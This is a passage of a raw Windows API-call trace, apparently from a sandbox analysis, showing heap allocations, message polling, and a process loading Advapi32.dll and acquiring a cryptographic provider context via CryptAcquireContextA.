(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0247.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0247.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0247.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.778] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0247.779] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0247.779] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0247.779] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0247.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0247.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.780] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.781] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.781] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0247.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0247.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54de8 [0247.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0247.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0247.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0247.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0247.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0247.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0247.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0247.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0247.819] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.819] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0247.819] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0247.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0247.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0247.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0247.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.820] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0247.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0247.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0247.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0247.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0247.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.820] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0247.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0247.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0247.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0247.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.821] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.821] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0247.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.821] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0247.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0247.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0247.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0247.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0247.822] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0247.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0247.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0247.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a68 [0247.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0247.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0247.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0247.822] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0247.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0247.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0247.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0247.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0247.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0247.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0247.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0247.823] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0247.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0247.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0247.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0247.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0247.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0247.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0247.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0247.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: 